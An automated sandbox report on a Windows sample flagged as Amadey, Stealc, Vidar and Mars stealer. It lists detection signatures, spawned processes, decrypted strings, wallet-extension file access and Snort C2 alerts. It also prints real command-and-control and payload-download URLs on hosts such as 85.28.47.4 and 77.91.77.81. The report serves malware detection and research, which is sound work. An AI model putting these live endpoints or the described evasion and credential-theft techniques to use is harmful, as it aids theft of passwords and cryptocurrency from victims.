Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
Analysis ID:1465915
MD5:ebe33b40ce854edd8e39259a1b980a65
SHA1:db07d27d6ee753c4b0f60ee50c0e052a12095ca3
SHA256:99e1c640be9fa28cee9b185982a47bbbefe8a699b79a22bfbb97c097fb0aec31
Tags:exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe" MD5: EBE33B40CE854EDD8E39259A1B980A65)
    • cmd.exe (PID: 7568 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • BGIIDAEBGC.exe (PID: 7632 cmdline: "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" MD5: 93899CE9A453CF1E50E1182DA46190A9)
        • explorti.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: 93899CE9A453CF1E50E1182DA46190A9)
          • a37ec701f3.exe (PID: 7344 cmdline: "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe" MD5: EBE33B40CE854EDD8E39259A1B980A65)
    • cmd.exe (PID: 7588 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorti.exe (PID: 5888 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 93899CE9A453CF1E50E1182DA46190A9)
  • explorti.exe (PID: 3704 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 93899CE9A453CF1E50E1182DA46190A9)
  • explorti.exe (PID: 3632 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 93899CE9A453CF1E50E1182DA46190A9)
  • explorti.exe (PID: 5376 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 93899CE9A453CF1E50E1182DA46190A9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.2741394085.00000000007C1000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000008.00000002.4133532873.00000000007C1000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000010.00000003.3899911028.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000F.00000003.3299622243.00000000052A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 17 entries
              SourceRuleDescriptionAuthorStrings
              16.2.explorti.exe.7c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                12.2.explorti.exe.7c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  8.2.explorti.exe.7c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    11.2.a37ec701f3.exe.120000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      11.2.a37ec701f3.exe.120000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                        Click to see the 5 entries
                        No Sigma rule has matched
                        Timestamp:07/02/24-08:26:19.712933
                        SID:2044246
                        Source Port:63880
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/02/24-08:26:18.793216
                        SID:2044243
                        Source Port:63880
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/02/24-08:26:19.532971
                        SID:2044244
                        Source Port:63880
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/02/24-08:26:19.711322
                        SID:2051828
                        Source Port:80
                        Destination Port:63880
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/02/24-08:26:19.892678
                        SID:2051831
                        Source Port:80
                        Destination Port:63880
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeAvira: detected
                        Source: http://77.91.77.81/mine/amadka.exeAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/920475a59bac849d.phpFBFAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll=Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/Avira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dll2Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.php4Avira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/aAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/rBJAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe00Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeDataAvira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/stealc/random.exeAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exe00Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/mine/amadka.exeaAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4Avira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exemAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/920475a59bac849d.phpnB~Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllSAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/stealc/random.exe50673b5d7XAvira URL Cloud: Label: phishing
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
                        Source: explorti.exe.8040.8.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}
                        Source: http://77.91.77.82/Hun4Ko/index.phpQVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exeVirustotal: Detection: 27%Perma Link
                        Source: http://85.28.47.4/Virustotal: Detection: 17%Perma Link
                        Source: http://77.91.77.81/cost/go.exeVirustotal: Detection: 27%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpVirustotal: Detection: 24%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpVVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php4Virustotal: Detection: 21%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpVirustotal: Detection: 22%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.php4Virustotal: Detection: 13%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllVirustotal: Detection: 7%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dllVirustotal: Detection: 9%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllVirustotal: Detection: 7%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe00Virustotal: Detection: 25%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://77.91.77.82/Virustotal: Detection: 23%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.phpVirustotal: Detection: 23%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 44%
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeReversingLabs: Detection: 44%
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeReversingLabs: Detection: 44%
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeVirustotal: Detection: 44%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeJoe Sandbox ML: detected
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeJoe Sandbox ML: detected
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: INSERT_KEY_HERE
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetProcAddress
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: LoadLibraryA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: lstrcatA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: OpenEventA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CreateEventA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CloseHandle
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: Sleep
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetUserDefaultLangID
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: VirtualAllocExNuma
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: VirtualFree
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetSystemInfo
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: VirtualAlloc
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: HeapAlloc
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetComputerNameA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: lstrcpyA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetProcessHeap
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetCurrentProcess
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: lstrlenA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: ExitProcess
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetSystemTime
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: SystemTimeToFileTime
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: advapi32.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: gdi32.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: user32.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: crypt32.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: ntdll.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetUserNameA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CreateDCA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetDeviceCaps
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: ReleaseDC
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CryptStringToBinaryA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: sscanf
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: VMwareVMware
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: HAL9TH
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: JohnDoe
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: DISPLAY
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: %hu/%hu/%hu
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: http://85.28.47.4
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: /920475a59bac849d.php
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: /69934896f997d5bb/
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: jony
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetEnvironmentVariableA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetFileAttributesA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GlobalLock
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: HeapFree
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetFileSize
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GlobalSize
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: IsWow64Process
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: Process32Next
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetLocalTime
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: FreeLibrary
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetTimeZoneInformation
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetSystemPowerStatus
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetVolumeInformationA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetWindowsDirectoryA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: Process32First
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetLocaleInfoA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetModuleFileNameA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: DeleteFileA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: FindNextFileA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: LocalFree
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: FindClose
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: SetEnvironmentVariableA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: LocalAlloc
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetFileSizeEx
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: ReadFile
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: SetFilePointer
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: WriteFile
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CreateFileA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: FindFirstFileA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CopyFileA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: VirtualProtect
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetLastError
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: lstrcpynA
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: MultiByteToWideChar
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GlobalFree
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: WideCharToMultiByte
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GlobalAlloc
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: OpenProcess
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: TerminateProcess
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: GetCurrentProcessId
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: gdiplus.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: ole32.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: bcrypt.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: wininet.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: shlwapi.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: shell32.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: psapi.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: rstrtmgr.dll
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: CreateCompatibleBitmap
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: SelectObject
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: BitBlt
                        Source: 11.2.a37ec701f3.exe.120000.0.unpackString decryptor: DeleteObject
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C4D6C80
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Binary string: mozglue.pdbP source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:63880 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:63880 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.4:63880
                        Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:63880 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.4:63880
                        Source: Malware configuration extractorURLs: http://85.28.47.4/920475a59bac849d.php
